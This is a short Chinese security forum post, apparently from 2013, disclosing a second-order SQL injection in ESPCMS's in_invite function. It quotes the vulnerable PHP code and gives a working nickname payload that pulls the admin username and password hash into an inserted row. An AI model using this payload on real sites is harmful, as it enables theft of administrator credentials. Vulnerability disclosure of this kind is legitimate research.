【我爱T00LS】ESPCMS 二次注入

2013-09-08 07:49:08 28 4444
漏洞位于 interface\public.php文件   in_invite 函数中

核心代码如下:
$ec_member_username_id = $this->member_cookieview('userid');
  if ($ec_member_username_id) {
   $rsMember = $this->get_member_attvalue($ec_member_username_id);
  }
  $userid = $ec_member_username_id ? $ec_member_username_id : 0;
  $name = $rsMember['alias'] ? $rsMember['alias'] : '';  //sink 二次注入
  
  $sex = $rsMember['sex'] ? $rsMember['sex'] : 0;
  $tel = $rsMember['tel'] ? addslashes($rsMember['tel']) : '';
  $address = $rsMember['address'] ? addslashes($rsMember['address']) : '';
  $db_field = 'mlvid,userid,name,sex,email,tel,address,isclass,addtime';
  $db_values = "$mlvid,$userid,'$name',$sex,'$email','$tel','$address',1,$addtime";
  
  
  $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
一个二次注入的问题 在个人资料中将昵称改成SQL语句 即可
SQL: ',0,(select concat(username,CHAR(0x7c),password) from espcms_admin_member limit 1),0,0,0,0)#
SQL: INSERT INTO espcms_mailinvite_list (mlvid,userid,name,sex,email,tel,address,isclass,addtime) VALUES (1,1,0,0,(select concat(username,CHAR(0x7c),password) from espcms_admin_member limit 1),0,0,0,0)#',0,'[email protected]','','xx',1,1370357340)
注入成果后得到如下图






发送订阅邮件时候 抓包得到概述里的图


关于作者

合肥滨湖虎子3篇文章53篇回复

评论28次

要评论?请先  登录  或  注册